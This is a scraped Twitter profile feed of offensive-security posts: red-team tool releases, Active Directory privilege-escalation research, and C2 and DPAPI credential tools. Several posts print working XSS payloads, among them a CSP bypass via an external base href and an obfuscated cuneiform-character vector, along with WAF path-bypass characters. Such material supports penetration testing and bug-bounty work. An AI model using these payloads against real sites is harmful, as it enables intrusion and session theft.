Ag0s (@ag0ssec)'s Twitter Profile
Ag0s

@ag0ssec

• special needs dad • red fedora hacker • personal account •

ID: 1013698772025708544

Joined: 02-07-2018 08:19:55

290 Tweets

54 Followers

327 Following

Daniel (@0x64616e)

How to WebDAV Relay LPE on Windows 11:
1-3. Trigger start of EFS service through Explorer
4-11. Continue like on Windows 10
Thanks again ret2src for the idea.

Any tip for triggering EFS remotely on Windows 11 would be greatly appreciated by the way :D

d4d (@d4d89704243)

You can bypass path-based WAF restrictions by appending raw/unencoded non-printable and extended-ASCII characters like \x09 (Spring), \xA0 (Express), and \x1C-1F (Flask):

KNOXSS (@kn0x55)

Some KNOXSS #XSS Vectors

Main + Inline
1')"<!--><Svg OnLoad=(confirm)(1)<!--

Full URL Validation
JavaScript://%250Dtop.confirm?.(1)//

Weak CSP Bypass
1'"><!--><Base Href=//X55.is?

Regular JS Injection
1'-top['con\146irm'](1)-'

Quoteless JSi
/confirm?.(1)//\

#XSS #BugBounty

Alex Neff (@al3x_n3ff)

NetExec v1.4.0 has been released! 🎉

There is a HUGE number of new features and improvements, including:
- backup_operator: Automatic priv esc for backup operators
- Certificate authentication
- NFS escape to root file system

And much more!
Full rundown:
github.com/Pennyw0rth/Net…

Nicolas Krassas (@dinosn)

BitLocker Encryption Bypassed in Minutes via Bitpixie (CVE-2023-21563) – PoC Reveals High-Risk Attack Path securityonline.info/bitlocker-encr…

nafiez (@zeifan)

I wrote a Metasploit module (for fun) that generates LNK files for two different Extra Data structures in Shell Link. Here is the proof of concept. github.com/nafiez/DataBlo…

mpgn (@mpgn_x64)

Thanks to the awesome work of Aleem Ladha, the CTF Windows Active Directory lab for Barbhack from 2024 is now public! 🔥 You can build the lab and pwn the AD—13 flags to capture! No public write-up exists yet—waiting for someone to submit one! github.com/Pennyw0rth/Net…

Steve S. (@0xtriboulet)

rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session. github.com/0xTriboulet/rs…

winterknife 🌻 (@_winterknife_)

Published a new WinDbg extension DLL to fetch kernel's DirBase using the Low Stub technique. This is not a novel technique but I did find some projects out there that seemed to be doing this incorrectly. Hope this helps :) github.com/winterknife/EV…

Panos Gkatziroulis 🦄 (@netbiosx)

Automated deployment of red team infrastructure through GitHub Actions workflows. It supports configurable C2 frameworks and phishing operations with a focus on secure, repeatable deployments. github.com/CultCornholio/…

Yuval Gordon (@yug0rd)

🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷‍♂️
Read Here - akamai.com/blog/security-…

Tony (@tj_null)

Someone made a python version of Evilwinrm and it works well!

Although it is missing a few features like bypassing AMSI, I would add this to your tools to have:

github.com/adityatelange/…

Florian Roth ⚡️ (@cyb3rops)

Windows SMB Client Elevation of Privilege Vulnerability

CVSS Score: 8.8

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None

Do I have to say more? 

msrc.microsoft.com/update-guide/v…

VIEH Group (@viehgroup)

an XSS payload, Cuneiform-alphabet based

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()

#bugbounty #bugbountytips #cybersecurity

ViperOne (@theviperone)

My new tool, Invoke-PowerDPAPI is able to obtain system master keys and decrypt various DPAPI encrypted material such as credentials, vaults and local SCCM encrypted blobs for NAA credentials and task sequences.

Github: github.com/The-Viper-One/…

Let me know what you think 😁

S3cur3Th1sSh1t (@shitsecure)

After today’s talk at #TROOPERS25 I’m releasing BitlockMove, a PoC to execute code on remote systems in the context of a logged-on user session 🔥 github.com/rtecCyberSec/B… No need to steal credentials, no impersonation, no injection needed 👌

S3cur3Th1sSh1t (@shitsecure)

To trigger local SYSTEM authentication for relaying to ADCS or LDAP for LPE you would usually need the printer service or EFS service to be enabled (printerbug/petitpotam). Here is an alternative without this requirement 🤠

github.com/rtecCyberSec/R…

S3cur3Th1sSh1t (@shitsecure)

Another Pentest, another time the NetExec Veeam module didn't work properly. Sometimes SYSTEM impersonation is needed, sometimes it's flagged by AMSI. You need to know about alternatives. SharpVeeamDecryptor now supports v12 and PostgreSQL Veeam instances 😎